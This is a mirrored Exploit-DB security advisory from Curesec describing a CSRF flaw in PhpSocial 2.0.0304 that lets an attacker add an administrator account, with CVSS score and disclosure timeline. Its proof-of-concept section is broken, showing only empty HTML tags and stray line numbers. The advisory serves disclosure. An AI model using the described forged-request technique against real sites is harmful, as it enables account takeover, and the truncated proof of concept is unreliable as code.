PhpSocial 2.0.0304_20222226 – Cross-Site Request Forgery - 体验盒子

作者： Curesec Research Team

日期： 2015-12-23

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/39086/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PhpSocial v2.0.0304_20222226

Fixed in:not fixed

Fixed Version Link:n/a

Vendor Webite: http://phpsocial.net

Vulnerability Type:CSRF

Remote Exploitable:Yes

Reported to vendor:11/21/2015

Disclosed to public: 12/21/2015

Release mode:Full Disclosure

CVE: n/a

CreditsTim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

PhpSocial is a social networking software written in PHP. In version v2.0.0304,

it does not have CSRF protection, which means that an attacker can perform

actions for a victim, if the victim visits an attacker controlled site while

logged in.

3. Proof of Concept

Add a new admin:

<html>

<body>

</form>

</body>

</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/ Contacted Vendor (no reply)

2015

12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does

2015 not exist, and contact form could not be used because the website is

down)

12/21/ Disclosed to public

2015

Blog Reference:

https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html

--

blog:https://blog.curesec.com

tweet: https://twitter.com/curesec

Curesec GmbH

Curesec Research Team

Romain-Rolland-Str 14-24

13089 Berlin, Germany